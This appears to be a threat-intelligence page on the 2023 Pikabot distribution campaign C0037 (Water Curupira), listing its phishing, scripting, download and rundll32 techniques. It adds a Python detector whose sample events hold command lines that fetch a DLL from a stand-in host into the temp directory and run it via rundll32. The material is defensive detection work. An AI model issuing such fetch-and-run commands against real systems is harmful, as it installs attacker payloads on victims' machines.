
C0037 Water Curupira Pikabot Distribution

During Water Curupira Pikabot Distribution, Pikabot was delivered via email attachments throughout 2023 by an entity linked to BlackBasta ransomware deployment. The activity followed the takedown of QakBot and showed several technical overlaps and similarities with QakBot, indicating a possible connection. The identified activity led to the deployment of tools such as Cobalt Strike, and coincided with campaigns delivering DarkGate and IcedID en route to ransomware deployment. [1]

ID: C0037
Associated Names: 
First Seen: January 2023
Last Seen: December 2023
Version: 1.0
Created: 17 July 2024
Last Modified: 28 October 2024

Techniques Used

Domain: enterprise (all entries)

T1059 Command and Scripting Interpreter
  T1059.003 Windows Command Shell: Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe. [1]
  T1059.007 JavaScript: Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives. [1]
T1140 Deobfuscate/Decode Files or Information: Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot. [1]
T1589 Gather Victim Identity Information
  T1589.002 Email Addresses: Water Curupira Pikabot Distribution utilizes thread spoofing of existing email threads in order to execute spear phishing operations. [1]
T1105 Ingress Tool Transfer: Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory. [1]
T1566 Phishing
  T1566.001 Spearphishing Attachment: Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers. [1]
T1218 System Binary Proxy Execution
  T1218.011 Rundll32: Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports Crash or Limit depending on the variant. [1]
T1204 User Execution: Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation. [1]
  T1204.001 Malicious Link: Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer. [1]
  T1204.002 Malicious File: Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL. [1]
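The technique entries above describe a three-stage installer chain: a script host (the obfuscated JavaScript) spawns cmd.exe, cmd.exe runs curl.exe to drop the payload in the user's temporary directory, and rundll32.exe then loads the dropped DLL by the export name Crash or Limit. The following detection sketch is an added example written for this page; it is not MITRE's code nor anything from the cited report. It runs three rules over constructed process-creation events (the field names parent_image, image and command_line, the user name alice, the file name update.dll and the example.invalid host are all assumptions made for the example) and reports whether every stage of the chain was observed, which is the correlation a SOC analyst would want before escalating a single rundll32 alert.

```python
"""Stage-by-stage detection of the JS -> cmd.exe -> curl.exe -> rundll32 chain.

Added example for the C0037 page: sample events are constructed, not real
telemetry, and all file names, hosts and user names are hypothetical.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the subset of a Sysmon event ID 1 or
    EDR process event that the rules below need)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Case-insensitive Windows basename; also works when run on non-Windows hosts."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Per-user and system temp directories (T1105: payload saved to the temp directory).
TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
# curl output flags that write the response body to a file.
CURL_OUTPUT_FLAG_RE = re.compile(r"(?:^|\s)(?:-o|-O|--output)(?=\s|$)")
# rundll32 <module>,<export>: the export name is the token after the comma
# (T1218.011: exports Crash or Limit depending on the variant).
RUNDLL32_EXPORT_RE = re.compile(r'([^\s,"]+)"?\s*,\s*(Crash|Limit)\b', re.IGNORECASE)


def script_host_spawns_cmd(ev: ProcEvent) -> bool:
    """T1059.003 / T1059.007: wscript/cscript launching cmd.exe."""
    return (_basename(ev.parent_image) in {"wscript.exe", "cscript.exe"}
            and _basename(ev.image) == "cmd.exe")


def curl_download_to_temp(ev: ProcEvent) -> bool:
    """T1105: curl.exe writing its output into a temp directory."""
    return (_basename(ev.image) == "curl.exe"
            and CURL_OUTPUT_FLAG_RE.search(ev.command_line) is not None
            and TEMP_DIR_RE.search(ev.command_line) is not None)


def rundll32_named_export(ev: ProcEvent) -> bool:
    """T1218.011: rundll32.exe invoking the export Crash or Limit."""
    return (_basename(ev.image) == "rundll32.exe"
            and RUNDLL32_EXPORT_RE.search(ev.command_line) is not None)


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "script_host_spawns_cmd": script_host_spawns_cmd,
    "curl_download_to_temp": curl_download_to_temp,
    "rundll32_named_export": rundll32_named_export,
}


def evaluate(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Run every rule over every event; one alert per (event, rule) hit."""
    alerts = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                alerts.append({"rule": name, "image": _basename(ev.image),
                               "command_line": ev.command_line})
    return alerts


def chain_observed(alerts: List[Dict[str, str]]) -> bool:
    """True when every stage of the installer chain fired at least once."""
    return set(RULES) <= {a["rule"] for a in alerts}


# Constructed sample events: three chain stages followed by three benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "curl.exe -o %TEMP%\update.dll http://example.invalid/f"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\alice\AppData\Local\Temp\update.dll http://example.invalid/f"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\update.dll,Limit"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL"),          # benign export name
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\build\artifact.zip http://example.invalid/a"),  # not a temp dir
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for a in hits:
        print(f"[{a['rule']}] {a['command_line']}")
    print("full chain observed:", chain_observed(hits))
```

Each rule on its own is noisy in a real estate (curl.exe and rundll32.exe have plenty of legitimate uses), so the point of chain_observed is to raise severity only when the script-host spawn, the temp-directory download and the named-export load all appear; in production the correlation would additionally be keyed on host and a short time window, which the flat list above omits.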

Software

ID     Name      Description
S1111  DarkGate  Water Curupira Pikabot Distribution activity included distribution of DarkGate en route to ransomware execution. [1]

References